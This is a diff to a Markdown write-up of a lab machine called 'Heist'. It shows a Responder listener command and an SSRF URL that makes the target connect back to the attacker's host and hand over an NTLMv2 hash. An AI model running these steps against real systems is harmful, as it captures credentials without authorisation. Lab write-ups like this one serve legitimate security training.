bipbopbup/bipbopbup/PG/AD/Heist.md

 ```
 sudo responder -I tun0
 ```
-and then try to connect to our machine:
+And then we will try to connect to our machine to see if we can exploit a Server Side Request Forgery (SSRF) attack:
 ```
 http://192.168.167.165:8080/?url=http://192.168.45.246/test
 ```
-And we get a NTLMv3 hash:
+Ineed we receive a NTLMv2 hash, which verifies that the target is vulnerable to a SSRF attack:

 ![](https://github.com/bipbopbup/writeups/blob/main/Media/Pasted%20image%2020241219094300.png?raw=true)